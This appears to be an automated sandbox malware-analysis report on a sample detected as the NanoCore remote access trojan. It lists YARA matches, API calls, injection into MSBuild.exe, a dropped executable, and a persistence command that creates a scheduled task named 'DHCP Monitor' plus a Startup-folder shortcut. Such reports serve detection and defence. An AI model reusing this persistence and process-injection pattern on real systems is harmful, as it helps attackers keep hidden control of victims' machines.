        Source: 0.3.qnJXJsqt1M.exe.1739f48.5.raw.unpack, type: UNPACKEDPEMatched rule: Nanocore_RAT_Gen_2 date = 2016-04-22, hash1 = 755f49a4ffef5b1b62f4b5a5de279868c0c1766b528648febf76628f1fe39050, author = Florian Roth, description = Detetcs the Nanocore RAT, license = https://creativecommons.org/licenses/by-nc/4.0/, score = https://www.sentinelone.com/blogs/teaching-an-old-rat-new-tricks/
        Source: 0.3.qnJXJsqt1M.exe.1739f48.5.raw.unpack, type: UNPACKEDPEMatched rule: Nanocore_RAT_Feb18_1 date = 2018-02-19, hash1 = aa486173e9d594729dbb5626748ce10a75ee966481b68c1b4f6323c827d9658c, author = Florian Roth, description = Detects Nanocore RAT, reference = Internal Research - T2T, license = https://creativecommons.org/licenses/by-nc/4.0/
        Source: 0.3.qnJXJsqt1M.exe.1739f48.5.raw.unpack, type: UNPACKEDPEMatched rule: NanoCore date = 2014/04, filetype = exe, author = Kevin Breen <kevin@techanarchy.net>, maltype = Remote Access Trojan, ref = http://malwareconfig.com/stats/NanoCore
        Source: 0.3.qnJXJsqt1M.exe.16ec7e0.1.unpack, type: UNPACKEDPEMatched rule: Nanocore_RAT_Gen_2 date = 2016-04-22, hash1 = 755f49a4ffef5b1b62f4b5a5de279868c0c1766b528648febf76628f1fe39050, author = Florian Roth, description = Detetcs the Nanocore RAT, license = https://creativecommons.org/licenses/by-nc/4.0/, score = https://www.sentinelone.com/blogs/teaching-an-old-rat-new-tricks/
        Source: 0.3.qnJXJsqt1M.exe.16ec7e0.1.unpack, type: UNPACKEDPEMatched rule: NanoCore date = 2014/04, filetype = exe, author = Kevin Breen <kevin@techanarchy.net>, maltype = Remote Access Trojan, ref = http://malwareconfig.com/stats/NanoCore
        Source: 0.3.qnJXJsqt1M.exe.17293d8.3.unpack, type: UNPACKEDPEMatched rule: Nanocore_RAT_Gen_2 date = 2016-04-22, hash1 = 755f49a4ffef5b1b62f4b5a5de279868c0c1766b528648febf76628f1fe39050, author = Florian Roth, description = Detetcs the Nanocore RAT, license = https://creativecommons.org/licenses/by-nc/4.0/, score = https://www.sentinelone.com/blogs/teaching-an-old-rat-new-tricks/
        Source: 0.3.qnJXJsqt1M.exe.17293d8.3.unpack, type: UNPACKEDPEMatched rule: NanoCore date = 2014/04, filetype = exe, author = Kevin Breen <kevin@techanarchy.net>, maltype = Remote Access Trojan, ref = http://malwareconfig.com/stats/NanoCore
        Source: 0.3.qnJXJsqt1M.exe.17293d8.0.unpack, type: UNPACKEDPEMatched rule: Nanocore_RAT_Gen_2 date = 2016-04-22, hash1 = 755f49a4ffef5b1b62f4b5a5de279868c0c1766b528648febf76628f1fe39050, author = Florian Roth, description = Detetcs the Nanocore RAT, license = https://creativecommons.org/licenses/by-nc/4.0/, score = https://www.sentinelone.com/blogs/teaching-an-old-rat-new-tricks/
        Source: 0.3.qnJXJsqt1M.exe.17293d8.0.unpack, type: UNPACKEDPEMatched rule: NanoCore date = 2014/04, filetype = exe, author = Kevin Breen <kevin@techanarchy.net>, maltype = Remote Access Trojan, ref = http://malwareconfig.com/stats/NanoCore
        Source: 1.2.MSBuild.exe.400000.0.unpack, u0023u003dqjIje6jGWLd2EOkfZXKqBbgu003du003d.csCryptographic APIs: 'TransformFinalBlock', 'CreateDecryptor'
        Source: 1.2.MSBuild.exe.400000.0.unpack, u0023u003dqVxXNKnhAcArgJoGGYXiyyQu003du003d.csCryptographic APIs: 'CreateDecryptor'
        Source: 1.2.MSBuild.exe.400000.0.unpack, u0023u003dqVxXNKnhAcArgJoGGYXiyyQu003du003d.csCryptographic APIs: 'TransformFinalBlock'
        Source: 12.2.MSBuild.exe.400000.0.unpack, u0023u003dqjIje6jGWLd2EOkfZXKqBbgu003du003d.csCryptographic APIs: 'TransformFinalBlock', 'CreateDecryptor'
        Source: 12.2.MSBuild.exe.400000.0.unpack, u0023u003dqVxXNKnhAcArgJoGGYXiyyQu003du003d.csCryptographic APIs: 'CreateDecryptor'
        Source: 12.2.MSBuild.exe.400000.0.unpack, u0023u003dqVxXNKnhAcArgJoGGYXiyyQu003du003d.csCryptographic APIs: 'TransformFinalBlock'
        Source: 1.2.MSBuild.exe.400000.0.unpack, u0023u003dqjIje6jGWLd2EOkfZXKqBbgu003du003d.csSecurity API names: System.Security.Principal.WindowsIdentity System.Security.Principal.WindowsIdentity::GetCurrent()
        Source: 1.2.MSBuild.exe.400000.0.unpack, u0023u003dqjIje6jGWLd2EOkfZXKqBbgu003du003d.csSecurity API names: System.Boolean System.Security.Principal.WindowsPrincipal::IsInRole(System.Security.Principal.WindowsBuiltInRole)
        Source: 12.2.MSBuild.exe.400000.0.unpack, u0023u003dqjIje6jGWLd2EOkfZXKqBbgu003du003d.csSecurity API names: System.Security.Principal.WindowsIdentity System.Security.Principal.WindowsIdentity::GetCurrent()
        Source: 12.2.MSBuild.exe.400000.0.unpack, u0023u003dqjIje6jGWLd2EOkfZXKqBbgu003du003d.csSecurity API names: System.Boolean System.Security.Principal.WindowsPrincipal::IsInRole(System.Security.Principal.WindowsBuiltInRole)
        Source: MSBuild.exe, 00000005.00000002.246059966.00000000030E1000.00000004.00000001.sdmpBinary or memory string: *.sln
        Source: classification engineClassification label: mal100.troj.evad.winEXE@11/10@13/3
        Source: C:\Users\user\Desktop\qnJXJsqt1M.exeCode function: 0_2_00B1CE7A GetLastError,FormatMessageW,
        Source: C:\Users\user\Desktop\qnJXJsqt1M.exeCode function: 0_2_00B0AB84 AdjustTokenPrivileges,CloseHandle,
        Source: C:\Users\user\Desktop\qnJXJsqt1M.exeCode function: 0_2_00B0B134 LookupPrivilegeValueW,AdjustTokenPrivileges,GetLastError,
        Source: C:\Windows\Microsoft.NET\Framework\v2.0.50727\MSBuild.exeCode function: 1_2_054212BA AdjustTokenPrivileges,
        Source: C:\Windows\Microsoft.NET\Framework\v2.0.50727\MSBuild.exeCode function: 1_2_05421283 AdjustTokenPrivileges,
        Source: C:\Users\user\Desktop\qnJXJsqt1M.exeCode function: 0_2_00B1E1FD SetErrorMode,GetDiskFreeSpaceExW,SetErrorMode,
        Source: C:\Users\user\Desktop\qnJXJsqt1M.exeCode function: 0_2_00B16532 CreateToolhelp32Snapshot,Process32FirstW,Process32NextW,__wsplitpath,_wcscat,FindCloseChangeNotification,
        Source: C:\Users\user\Desktop\qnJXJsqt1M.exeCode function: 0_2_00B2C18C CoInitializeSecurity,_memset,_memset,CoCreateInstanceEx,CoTaskMemFree,CoSetProxyBlanket,
        Source: C:\Users\user\Desktop\qnJXJsqt1M.exeCode function: 0_2_00AD406B CreateStreamOnHGlobal,FindResourceExW,LoadResource,SizeofResource,LockResource,
        Source: C:\Users\user\Desktop\qnJXJsqt1M.exeFile created: C:\Users\user\AppData\Roaming\hdoydskbdxJump to behavior
        Source: C:\Windows\System32\conhost.exeMutant created: \Sessions\1\BaseNamedObjects\Local\SM0:5484:120:WilError_01
        Source: C:\Windows\Microsoft.NET\Framework\v2.0.50727\MSBuild.exeMutant created: \Sessions\1\BaseNamedObjects\Global\{2ad4e32f-c687-4329-b5e5-302ef0e0906d}
        Source: C:\Windows\Microsoft.NET\Framework\v2.0.50727\MSBuild.exeMutant created: \Sessions\1\BaseNamedObjects\Global\.net clr networking
        Source: C:\Users\user\Desktop\qnJXJsqt1M.exeFile created: C:\Users\user~1\AppData\Local\Temp\autB7CF.tmpJump to behavior
        Source: qnJXJsqt1M.exeStatic PE information: Section: .text IMAGE_SCN_MEM_EXECUTE, IMAGE_SCN_CNT_CODE, IMAGE_SCN_MEM_READ
        Source: C:\Windows\Microsoft.NET\Framework\v2.0.50727\MSBuild.exeSection loaded: C:\Windows\assembly\NativeImages_v2.0.50727_32\mscorlib\9603718106bd57ecfbb18fefd769cab4\mscorlib.ni.dll
        Source: C:\Windows\Microsoft.NET\Framework\v2.0.50727\MSBuild.exeSection loaded: C:\Windows\assembly\GAC_32\mscorlib\2.0.0.0__b77a5c561934e089\sorttbls.nlp
        Source: C:\Windows\Microsoft.NET\Framework\v2.0.50727\MSBuild.exeSection loaded: C:\Windows\assembly\GAC_32\mscorlib\2.0.0.0__b77a5c561934e089\sortkey.nlp
        Source: C:\Windows\Microsoft.NET\Framework\v2.0.50727\MSBuild.exeSection loaded: C:\Windows\assembly\NativeImages_v2.0.50727_32\mscorlib\9603718106bd57ecfbb18fefd769cab4\mscorlib.ni.dll
        Source: C:\Windows\Microsoft.NET\Framework\v2.0.50727\MSBuild.exeSection loaded: C:\Windows\assembly\GAC_32\mscorlib\2.0.0.0__b77a5c561934e089\sorttbls.nlp
        Source: C:\Windows\Microsoft.NET\Framework\v2.0.50727\MSBuild.exeSection loaded: C:\Windows\assembly\GAC_32\mscorlib\2.0.0.0__b77a5c561934e089\sortkey.nlp
        Source: C:\Windows\Microsoft.NET\Framework\v2.0.50727\MSBuild.exeSection loaded: C:\Windows\assembly\NativeImages_v2.0.50727_32\mscorlib\9603718106bd57ecfbb18fefd769cab4\mscorlib.ni.dll
        Source: C:\Users\user\Desktop\qnJXJsqt1M.exeKey opened: HKEY_CURRENT_USER\Software\Policies\Microsoft\Windows\Safer\CodeIdentifiers
        Source: qnJXJsqt1M.exeVirustotal: Detection: 67%
        Source: qnJXJsqt1M.exeMetadefender: Detection: 37%
        Source: qnJXJsqt1M.exeReversingLabs: Detection: 79%
        Source: C:\Users\user\Desktop\qnJXJsqt1M.exeFile read: C:\Users\user\Desktop\qnJXJsqt1M.exeJump to behavior
        Source: unknownProcess created: C:\Users\user\Desktop\qnJXJsqt1M.exe 'C:\Users\user\Desktop\qnJXJsqt1M.exe'
        Source: C:\Users\user\Desktop\qnJXJsqt1M.exeProcess created: C:\Windows\Microsoft.NET\Framework\v2.0.50727\MSBuild.exe C:\Windows\Microsoft.NET\Framework\v2.0.50727\MSBuild.exe
        Source: C:\Windows\Microsoft.NET\Framework\v2.0.50727\MSBuild.exeProcess created: C:\Windows\SysWOW64\schtasks.exe 'schtasks.exe' /create /f /tn 'DHCP Monitor' /xml 'C:\Users\user\AppData\Local\Temp\tmpC4DF.tmp'
        Source: C:\Windows\SysWOW64\schtasks.exeProcess created: C:\Windows\System32\conhost.exe C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
        Source: unknownProcess created: C:\Windows\Microsoft.NET\Framework\v2.0.50727\MSBuild.exe C:\Windows\Microsoft.NET\Framework\v2.0.50727\MSBuild.exe 0
        Source: C:\Windows\Microsoft.NET\Framework\v2.0.50727\MSBuild.exeProcess created: C:\Windows\System32\conhost.exe C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
        Source: unknownProcess created: C:\Users\user\AppData\Roaming\hdoydskbdx\znytpstdcrwsisx.exe 'C:\Users\user\AppData\Roaming\hdoydskbdx\znytpstdcrwsisx.exe'
        Source: C:\Users\user\AppData\Roaming\hdoydskbdx\znytpstdcrwsisx.exeProcess created: C:\Windows\Microsoft.NET\Framework\v2.0.50727\MSBuild.exe C:\Windows\Microsoft.NET\Framework\v2.0.50727\MSBuild.exe
        Source: C:\Users\user\Desktop\qnJXJsqt1M.exeProcess created: C:\Windows\Microsoft.NET\Framework\v2.0.50727\MSBuild.exe C:\Windows\Microsoft.NET\Framework\v2.0.50727\MSBuild.exe
        Source: C:\Windows\Microsoft.NET\Framework\v2.0.50727\MSBuild.exeProcess created: C:\Windows\SysWOW64\schtasks.exe 'schtasks.exe' /create /f /tn 'DHCP Monitor' /xml 'C:\Users\user\AppData\Local\Temp\tmpC4DF.tmp'
        Source: C:\Users\user\AppData\Roaming\hdoydskbdx\znytpstdcrwsisx.exeProcess created: C:\Windows\Microsoft.NET\Framework\v2.0.50727\MSBuild.exe C:\Windows\Microsoft.NET\Framework\v2.0.50727\MSBuild.exe
        Source: C:\Windows\Microsoft.NET\Framework\v2.0.50727\MSBuild.exeKey value queried: HKEY_LOCAL_MACHINE\SOFTWARE\Classes\WOW6432Node\CLSID\{0A29FF9E-7F9C-4437-8B11-F424491E3931}\InprocServer32
        Source: Window RecorderWindow detected: More than 3 window changes detected
        Source: C:\Windows\Microsoft.NET\Framework\v2.0.50727\MSBuild.exeFile opened: C:\Windows\Microsoft.NET\Framework\v2.0.50727\mscorrc.dll
        Source: qnJXJsqt1M.exeStatic file information: File size 1253376 > 1048576
        Source: C:\Windows\Microsoft.NET\Framework\v2.0.50727\MSBuild.exeFile opened: C:\Windows\WinSxS\x86_microsoft.vc80.crt_1fc8b3b9a1e18e3b_8.0.50727.9445_none_d08c58b4442ba54f\MSVCR80.dll
        Source: qnJXJsqt1M.exeStatic PE information: data directory type: IMAGE_DIRECTORY_ENTRY_IMPORT
        Source: qnJXJsqt1M.exeStatic PE information: data directory type: IMAGE_DIRECTORY_ENTRY_RESOURCE
        Source: qnJXJsqt1M.exeStatic PE information: data directory type: IMAGE_DIRECTORY_ENTRY_BASERELOC
        Source: qnJXJsqt1M.exeStatic PE information: data directory type: IMAGE_DIRECTORY_ENTRY_DEBUG
        Source: qnJXJsqt1M.exeStatic PE information: data directory type: IMAGE_DIRECTORY_ENTRY_LOAD_CONFIG
        Source: qnJXJsqt1M.exeStatic PE information: data directory type: IMAGE_DIRECTORY_ENTRY_IAT
        Source: qnJXJsqt1M.exeStatic PE information: data directory type: IMAGE_DIRECTORY_ENTRY_DEBUG
        Source: Binary string: indows\MSBuild.pdbpdbild.pdbs source: MSBuild.exe, 00000001.00000002.501509094.00000000013A6000.00000004.00000040.sdmp
        Source: Binary string: C:\Windows\MSBuild.pdbl source: MSBuild.exe, 00000001.00000002.501509094.00000000013A6000.00000004.00000040.sdmp
        Source: Binary string: C:\Windows\Microsoft.NET\Framework\v2.0.50727\MSBuild.pdb source: MSBuild.exe, 00000001.00000002.501509094.00000000013A6000.00000004.00000040.sdmp
        Source: Binary string: C:\Windows\exe\MSBuild.pdb source: MSBuild.exe, 00000001.00000002.501509094.00000000013A6000.00000004.00000040.sdmp
        Source: Binary string: f:\dd\vsproject\xmake\XMakeCommandLine\objr\i386\MSBuild.pdb source: MSBuild.exe, 00000001.00000002.501509094.00000000013A6000.00000004.00000040.sdmp
        Source: Binary string: mscorrc.pdb source: MSBuild.exe, 00000001.00000002.507151725.00000000059F0000.00000002.00000001.sdmp
        Source: Binary string: C:\Windows\symbols\exe\MSBuild.pdb source: MSBuild.exe, 00000001.00000002.501509094.00000000013A6000.00000004.00000040.sdmp
        Source: qnJXJsqt1M.exeStatic PE information: Data directory: IMAGE_DIRECTORY_ENTRY_IMPORT is in: .rdata
        Source: qnJXJsqt1M.exeStatic PE information: Data directory: IMAGE_DIRECTORY_ENTRY_RESOURCE is in: .rsrc
        Source: qnJXJsqt1M.exeStatic PE information: Data directory: IMAGE_DIRECTORY_ENTRY_BASERELOC is in: .reloc
        Source: qnJXJsqt1M.exeStatic PE information: Data directory: IMAGE_DIRECTORY_ENTRY_LOAD_CONFIG is in: .rdata
        Source: qnJXJsqt1M.exeStatic PE information: Data directory: IMAGE_DIRECTORY_ENTRY_IAT is in: .rdata

        Data Obfuscation:

        barindex
        .NET source code contains potential unpackerShow sources
        Source: 1.2.MSBuild.exe.400000.0.unpack, u0023u003dqjIje6jGWLd2EOkfZXKqBbgu003du003d.cs.Net Code: #=q_FL69pQf17BUSAFbWYu1SStMAbdu$R1GJ8VY8UL5_EA= System.Reflection.Assembly System.Reflection.Assembly::Load(System.Byte[])
        Source: 1.2.MSBuild.exe.400000.0.unpack, u0023u003dqxoz66kOqvxr21iYXZYXWiumy9eZGwFWaiX4C5X8aecUu003d.cs.Net Code: #=qKU0J1fiP8KA33eFK1owekQ== System.Reflection.Assembly System.Reflection.Assembly::Load(System.Byte[])
        Source: 12.2.MSBuild.exe.400000.0.unpack, u0023u003dqjIje6jGWLd2EOkfZXKqBbgu003du003d.cs.Net Code: #=q_FL69pQf17BUSAFbWYu1SStMAbdu$R1GJ8VY8UL5_EA= System.Reflection.Assembly System.Reflection.Assembly::Load(System.Byte[])
        Source: 12.2.MSBuild.exe.400000.0.unpack, u0023u003dqxoz66kOqvxr21iYXZYXWiumy9eZGwFWaiX4C5X8aecUu003d.cs.Net Code: #=qKU0J1fiP8KA33eFK1owekQ== System.Reflection.Assembly System.Reflection.Assembly::Load(System.Byte[])
        Source: C:\Users\user\Desktop\qnJXJsqt1M.exeCode function: 0_2_00AEE01E LoadLibraryA,GetProcAddress,
        Source: znytpstdcrwsisx.exe.0.drStatic PE information: real checksum: 0x12035b should be: 0x140fd1
        Source: qnJXJsqt1M.exeStatic PE information: real checksum: 0x12035b should be: 0x133735
        Source: C:\Users\user\Desktop\qnJXJsqt1M.exeCode function: 0_2_00AF6B05 push ecx; ret
        Source: C:\Windows\Microsoft.NET\Framework\v2.0.50727\MSBuild.exeCode function: 1_2_01309E34 pushfd ; retf
        Source: C:\Windows\Microsoft.NET\Framework\v2.0.50727\MSBuild.exeCode function: 1_2_01309D5C push 780130CBh; retf
        Source: C:\Windows\Microsoft.NET\Framework\v2.0.50727\MSBuild.exeCode function: 1_2_013074B8 push ebp; ret
        Source: C:\Windows\Microsoft.NET\Framework\v2.0.50727\MSBuild.exeCode function: 1_2_013074AC push ecx; ret
        Source: C:\Windows\Microsoft.NET\Framework\v2.0.50727\MSBuild.exeCode function: 1_2_0130769F push es; ret
        Source: C:\Windows\Microsoft.NET\Framework\v2.0.50727\MSBuild.exeCode function: 1_2_013062D1 push ebx; retf
        Source: C:\Windows\Microsoft.NET\Framework\v2.0.50727\MSBuild.exeCode function: 1_2_013062D4 push ebx; retf
        Source: C:\Users\user\AppData\Roaming\hdoydskbdx\znytpstdcrwsisx.exeCode function: 11_2_00D76B05 push ecx; ret
        Source: 1.2.MSBuild.exe.400000.0.unpack, u0023u003dqWrm21vQ8CBMZP_RBTwpusAu003du003d.csHigh entropy of concatenated method names: '#=qCgU$tDqtOAyz2b$RwfSF7UzBcCAr0rFJWxm16x7Lre0=', '#=qeD3MBfedCIuKIQf9V1u2N3YS4VXE_FOHqw_XAjWtZK8=', '#=q$mvEHEBkZud$AdHPWqsMQnw5Xm5sD4vBSSmqrKuXGOk=', '#=qZaN94n8dM6tBEf$qCdY2kbTZb5BOW8Z134$2tNv7EJs=', '#=qtlZnL8mho$rv1eTFz0Mw9UYFC_yCabEZ0xtVePn6wR5aSHE7ti3UfKg2l7D0_xk8', '#=qVS$QmQjvFfsXSqQAKGSl6HGbkse2SG0XCab4upVjtRJkvhTEk$oIS2I9Zja7id1Q', '#=qxJg7RxTW1v5mnt12xXeJiYJv_bcctbtL2BCD5MjDi45Hlz6t8vwDNTv1Rv7tgIct', '#=qp$ZVC1r9spi890l$D7IwEd3faoKeWHvv42mVq8wIIWM=', '#=qCoWHlVuoVRMkOzC7RZubJCslkxaEWn9yZiIydECf69$ktj0IPD5wAwC2H5Cc8C$L', '#=qqs1moO$mYaS72OXOWe0Z6GycslEb6e9Ipoy7ppW0O5abIp05ajv8doqdJZHlN3cK'
        Source: 1.2.MSBuild.exe.400000.0.unpack, u0023u003dqJT4I5hOweIku0024xYFEeDszbikglXCuquUdu0024v9AXtyq2nsu003d.csHigh entropy of concatenated method names: '#=qBeOBlH6CwHFnQdZWWBgZ_pemudZ6CfCVcfOQtgpeG$Y=', '#=q5v5cLSMFBaxiTtOEjscx86gN2ozXlfytiL6UmXnyWtg=', '#=q_XA5h2lVGHLcY9dK754wKGrOjAm6aBbwPxcUJXgJThJUz83kMbCL53G5uuOLP6Rq', '#=qIFfr$DrKqIieRc688$vylAlBsEnx9Z3$TxvrDsPURfM=', '#=qejgvNXJQvgM2GomZsygLjreyguSPQ29pQHqjR_a0dWk=', '#=qCGokdf0OOxeMJLDkXSfc3NPmwygIQ29RjKQWj$wbNGB9C1pPgma_891QiNyTRXcA', '#=qDqyUVyJLXCtYqhZ0$opqkomqhUBn2WCeEEvGAXlNQ$I=', '#=qdImPAY1o3YhbLtukwCQ91cISaeIEWRKSYrGZ3dTVnkY=', '#=qza7O1AHrroJC7yRIJz4wINR_Sgo4hDpQrj_OYfIrlJE=', '#=q6Ct3QmvVLFC7my$dL1uEiHGmXJ5qCuK4WIhDwfhPTFs='
        Source: 12.2.MSBuild.exe.400000.0.unpack, u0023u003dqJT4I5hOweIku0024xYFEeDszbikglXCuquUdu0024v9AXtyq2nsu003d.csHigh entropy of concatenated method names: '#=qBeOBlH6CwHFnQdZWWBgZ_pemudZ6CfCVcfOQtgpeG$Y=', '#=q5v5cLSMFBaxiTtOEjscx86gN2ozXlfytiL6UmXnyWtg=', '#=q_XA5h2lVGHLcY9dK754wKGrOjAm6aBbwPxcUJXgJThJUz83kMbCL53G5uuOLP6Rq', '#=qIFfr$DrKqIieRc688$vylAlBsEnx9Z3$TxvrDsPURfM=', '#=qejgvNXJQvgM2GomZsygLjreyguSPQ29pQHqjR_a0dWk=', '#=qCGokdf0OOxeMJLDkXSfc3NPmwygIQ29RjKQWj$wbNGB9C1pPgma_891QiNyTRXcA', '#=qDqyUVyJLXCtYqhZ0$opqkomqhUBn2WCeEEvGAXlNQ$I=', '#=qdImPAY1o3YhbLtukwCQ91cISaeIEWRKSYrGZ3dTVnkY=', '#=qza7O1AHrroJC7yRIJz4wINR_Sgo4hDpQrj_OYfIrlJE=', '#=q6Ct3QmvVLFC7my$dL1uEiHGmXJ5qCuK4WIhDwfhPTFs='
        Source: 12.2.MSBuild.exe.400000.0.unpack, u0023u003dqWrm21vQ8CBMZP_RBTwpusAu003du003d.csHigh entropy of concatenated method names: '#=qCgU$tDqtOAyz2b$RwfSF7UzBcCAr0rFJWxm16x7Lre0=', '#=qeD3MBfedCIuKIQf9V1u2N3YS4VXE_FOHqw_XAjWtZK8=', '#=q$mvEHEBkZud$AdHPWqsMQnw5Xm5sD4vBSSmqrKuXGOk=', '#=qZaN94n8dM6tBEf$qCdY2kbTZb5BOW8Z134$2tNv7EJs=', '#=qtlZnL8mho$rv1eTFz0Mw9UYFC_yCabEZ0xtVePn6wR5aSHE7ti3UfKg2l7D0_xk8', '#=qVS$QmQjvFfsXSqQAKGSl6HGbkse2SG0XCab4upVjtRJkvhTEk$oIS2I9Zja7id1Q', '#=qxJg7RxTW1v5mnt12xXeJiYJv_bcctbtL2BCD5MjDi45Hlz6t8vwDNTv1Rv7tgIct', '#=qp$ZVC1r9spi890l$D7IwEd3faoKeWHvv42mVq8wIIWM=', '#=qCoWHlVuoVRMkOzC7RZubJCslkxaEWn9yZiIydECf69$ktj0IPD5wAwC2H5Cc8C$L', '#=qqs1moO$mYaS72OXOWe0Z6GycslEb6e9Ipoy7ppW0O5abIp05ajv8doqdJZHlN3cK'
        Source: C:\Users\user\Desktop\qnJXJsqt1M.exeFile created: C:\Users\user\AppData\Roaming\hdoydskbdx\znytpstdcrwsisx.exeJump to dropped file

        Boot Survival:

        barindex
        Uses schtasks.exe or at.exe to add and modify task schedulesShow sources
        Source: C:\Windows\Microsoft.NET\Framework\v2.0.50727\MSBuild.exeProcess created: C:\Windows\SysWOW64\schtasks.exe 'schtasks.exe' /create /f /tn 'DHCP Monitor' /xml 'C:\Users\user\AppData\Local\Temp\tmpC4DF.tmp'
        Source: C:\Users\user\Desktop\qnJXJsqt1M.exeFile created: C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\znytpstdcrwsisx.fr.urlJump to behavior
        Source: C:\Users\user\Desktop\qnJXJsqt1M.exeFile created: C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\znytpstdcrwsisx.fr.urlJump to behavior
        Source: C:\Users\user\Desktop\qnJXJsqt1M.exeCode function: 0_2_00AEEB42 GetForegroundWindow,FindWindowW,IsIconic,ShowWindow,SetForegroundWindow,GetWindowThreadProcessId,GetWindowThreadProcessId,GetCurrentThreadId,GetWindowThreadProcessId,AttachThreadInput,AttachThreadInput,AttachThreadInput,AttachThreadInput,SetForegroundWindow,MapVirtualKeyW,MapVirtualKeyW,keybd_event,keybd_event,MapVirtualKeyW,keybd_event,MapVirtualKeyW,keybd_event,MapVirtualKeyW,keybd_event,SetForegroundWindow,AttachThreadInput,AttachThreadInput,AttachThreadInput,AttachThreadInput,
        Source: C:\Users\user\Desktop\qnJXJsqt1M.exeCode function: 0_2_00B38111 IsWindowVisible,IsWindowEnabled,GetForegroundWindow,IsIconic,IsZoomed,
        Source: C:\Users\user\Desktop\qnJXJsqt1M.exeCode function: 0_2_00AF123A __initp_misc_winsig,GetModuleHandleW,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,
        Source: C:\Users\user\Desktop\qnJXJsqt1M.exeProcess information set: NOOPENFILEERRORBOX
        Source: C:\Windows\Microsoft.NET\Framework\v2.0.50727\MSBuild.exeProcess information set: NOOPENFILEERRORBOX
        Source: C:\Windows\Microsoft.NET\Framework\v2.0.50727\MSBuild.exeProcess information set: NOOPENFILEERRORBOX
        Source: C:\Windows\Microsoft.NET\Framework\v2.0.50727\MSBuild.exeProcess information set: NOOPENFILEERRORBOX
        Source: C:\Windows\Microsoft.NET\Framework\v2.0.50727\MSBuild.exeProcess information set: NOOPENFILEERRORBOX
        Source: C:\Windows\Microsoft.NET\Framework\v2.0.50727\MSBuild.exeProcess information set: NOOPENFILEERRORBOX
        Source: C:\Windows\Microsoft.NET\Framework\v2.0.50727\MSBuild.exeProcess information set: NOOPENFILEERRORBOX
        Source: C:\Windows\Microsoft.NET\Framework\v2.0.50727\MSBuild.exeProcess information set: NOOPENFILEERRORBOX
        Source: C:\Windows\Microsoft.NET\Framework\v2.0.50727\MSBuild.exeProcess information set: NOOPENFILEERRORBOX
        Source: C:\Windows\Microsoft.NET\Framework\v2.0.50727\MSBuild.exeProcess information set: NOOPENFILEERRORBOX
        Source: C:\Windows\Microsoft.NET\Framework\v2.0.50727\MSBuild.exeProcess information set: NOOPENFILEERRORBOX
        Source: C:\Windows\Microsoft.NET\Framework\v2.0.50727\MSBuild.exeProcess information set: NOOPENFILEERRORBOX
        Source: C:\Windows\Microsoft.NET\Framework\v2.0.50727\MSBuild.exeProcess information set: NOOPENFILEERRORBOX
        Source: C:\Windows\Microsoft.NET\Framework\v2.0.50727\MSBuild.exeProcess information set: NOOPENFILEERRORBOX
        Source: C:\Windows\Microsoft.NET\Framework\v2.0.50727\MSBuild.exeProcess information set: NOOPENFILEERRORBOX
        Source: C:\Windows\Microsoft.NET\Framework\v2.0.50727\MSBuild.exeProcess information set: NOOPENFILEERRORBOX
        Source: C:\Windows\Microsoft.NET\Framework\v2.0.50727\MSBuild.exeProcess information set: NOOPENFILEERRORBOX
        Source: C:\Windows\Microsoft.NET\Framework\v2.0.50727\MSBuild.exeProcess information set: NOOPENFILEERRORBOX
        Source: C:\Windows\Microsoft.NET\Framework\v2.0.50727\MSBuild.exeProcess information set: NOOPENFILEERRORBOX
        Source: C:\Windows\Microsoft.NET\Framework\v2.0.50727\MSBuild.exeProcess information set: NOOPENFILEERRORBOX
        Source: C:\Windows\Microsoft.NET\Framework\v2.0.50727\MSBuild.exeProcess information set: NOOPENFILEERRORBOX
        Source: C:\Windows\Microsoft.NET\Framework\v2.0.50727\MSBuild.exeProcess information set: NOOPENFILEERRORBOX
        Source: C:\Windows\Microsoft.NET\Framework\v2.0.50727\MSBuild.exeProcess information set: NOOPENFILEERRORBOX
        Source: C:\Windows\Microsoft.NET\Framework\v2.0.50727\MSBuild.exeProcess information set: NOOPENFILEERRORBOX
        Source: C:\Windows\Microsoft.NET\Framework\v2.0.50727\MSBuild.exeProcess information set: NOOPENFILEERRORBOX
        Source: C:\Windows\Microsoft.NET\Framework\v2.0.50727\MSBuild.exeProcess information set: NOOPENFILEERRORBOX
        Source: C:\Windows\Microsoft.NET\Framework\v2.0.50727\MSBuild.exeProcess information set: NOOPENFILEERRORBOX
        Source: C:\Windows\Microsoft.NET\Framework\v2.0.50727\MSBuild.exeProcess information set: NOOPENFILEERRORBOX
        Source: C:\Windows\Microsoft.NET\Framework\v2.0.50727\MSBuild.exeProcess information set: NOOPENFILEERRORBOX
        Source: C:\Windows\Microsoft.NET\Framework\v2.0.50727\MSBuild.exeProcess information set: NOOPENFILEERRORBOX
        Source: C:\Windows\Microsoft.NET\Framework\v2.0.50727\MSBuild.exeProcess information set: NOOPENFILEERRORBOX
        Source: C:\Windows\Microsoft.NET\Framework\v2.0.50727\MSBuild.exeProcess information set: NOOPENFILEERRORBOX
        Source: C:\Windows\Microsoft.NET\Framework\v2.0.50727\MSBuild.exeProcess information set: NOOPENFILEERRORBOX
        Source: C:\Windows\Microsoft.NET\Framework\v2.0.50727\MSBuild.exeProcess information set: NOOPENFILEERRORBOX
        Source: C:\Windows\Microsoft.NET\Framework\v2.0.50727\MSBuild.exeProcess information set: NOOPENFILEERRORBOX
        Source: C:\Windows\Microsoft.NET\Framework\v2.0.50727\MSBuild.exeProcess information set: NOOPENFILEERRORBOX
        Source: C:\Windows\Microsoft.NET\Framework\v2.0.50727\MSBuild.exeProcess information set: NOOPENFILEERRORBOX
        Source: C:\Windows\Microsoft.NET\Framework\v2.0.50727\MSBuild.exeProcess information set: NOOPENFILEERRORBOX
        Source: C:\Windows\Microsoft.NET\Framework\v2.0.50727\MSBuild.exeProcess information set: NOOPENFILEERRORBOX
        Source: C:\Windows\Microsoft.NET\Framework\v2.0.50727\MSBuild.exeProcess information set: NOOPENFILEERRORBOX
